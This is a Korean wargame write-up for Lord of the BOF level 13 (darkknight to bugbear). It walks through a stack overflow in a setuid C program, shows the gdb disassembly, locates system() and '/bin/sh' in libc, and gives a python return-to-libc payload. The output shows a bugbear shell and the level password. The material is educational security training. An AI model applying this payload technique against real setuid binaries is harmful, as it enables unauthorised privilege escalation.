[시스템해킹][LOB] Level 13 : Darkknight -> Bugbear

해당 문제는 BOF에 Basic RTL을 보면 좀더 쉽게 이해할 수 있다.

아래는 진행관련해서 순서적으로 나열했다.

[darkknight@localhost darkknight]$ cat bugbear.c /*         The Lord of the BOF : The Fellowship of the BOF         - bugbear         - RTL1 */ #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); } if(argv[1][47] == '\xbf') { printf("stack betrayed you!!\n"); exit(0); } strcpy(buffer, argv[1]);  printf("%s\n", buffer); }

(gdb) set disassembly-flavor intel (gdb) disass main Dump of assembler code for function main: 0x8048430 <main>: push   %ebp 0x8048431 <main+1>: mov    %ebp,%esp 0x8048433 <main+3>: sub    %esp,44 0x8048436 <main+6>: cmp    DWORD PTR [%ebp+8],1 0x804843a <main+10>: jg     0x8048453 <main+35> 0x804843c <main+12>: push   0x8048500 0x8048441 <main+17>: call   0x8048350 <printf> 0x8048446 <main+22>: add    %esp,4 0x8048449 <main+25>: push   0 0x804844b <main+27>: call   0x8048360 <exit> 0x8048450 <main+32>: add    %esp,4 0x8048453 <main+35>: mov    %eax,DWORD PTR [%ebp+12] 0x8048456 <main+38>: add    %eax,4 0x8048459 <main+41>: mov    %edx,DWORD PTR [%eax] 0x804845b <main+43>: add    %edx,47 0x804845e <main+46>: cmp    BYTE PTR [%edx],0xbf 0x8048461 <main+49>: jne    0x8048480 <main+80> 0x8048463 <main+51>: push   0x804850c 0x8048468 <main+56>: call   0x8048350 <printf> 0x804846d <main+61>: add    %esp,4 0x8048470 <main+64>: push   0 0x8048472 <main+66>: call   0x8048360 <exit> 0x8048477 <main+71>: add    %esp,4 0x804847a <main+74>: lea    %esi,[%esi] 0x8048480 <main+80>: mov    %eax,DWORD PTR [%ebp+12] 0x8048483 <main+83>: add    %eax,4 0x8048486 <main+86>: mov    %edx,DWORD PTR [%eax] 0x8048488 <main+88>: push   %edx 0x8048489 <main+89>: lea    %eax,[%ebp-40] 0x804848c <main+92>: push   %eax 0x804848d <main+93>: call   0x8048370 <strcpy> 0x8048492 <main+98>: add    %esp,8 0x8048495 <main+101>: lea    %eax,[%ebp-40] 0x8048498 <main+104>: push   %eax 0x8048499 <main+105>: push   0x8048522 0x804849e <main+110>: call   0x8048350 <printf> 0x80484a3 <main+115>: add    %esp,8 0x80484a6 <main+118>: leave   0x80484a7 <main+119>: ret     0x80484a8 <main+120>: nop     0x80484a9 <main+121>: nop

Breakpoint 1, 0x8048436 in main () (gdb) print system  $1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

[darkknight@localhost darkknight]$ vi getsh.c           #include <stdio.h> #include <string.h> int main(){         char *ptr = 0x40058ae0;         for(;;){                 if(strcmp("/bin/sh", ptr)==0){                         printf("0x%x\n", ptr);                         exit(0);                 }                 ptr++;         } }  [darkknight@localhost darkknight]$ ./getsh 0x400fbff9

$(python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"BBBB"+"\xf9\xbf\x0f\x40"')

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��@BBBB��@ bash$ whoami bugbear bash$ id  uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight) bash$ /bin/my-pass euid = 513 new divide bash$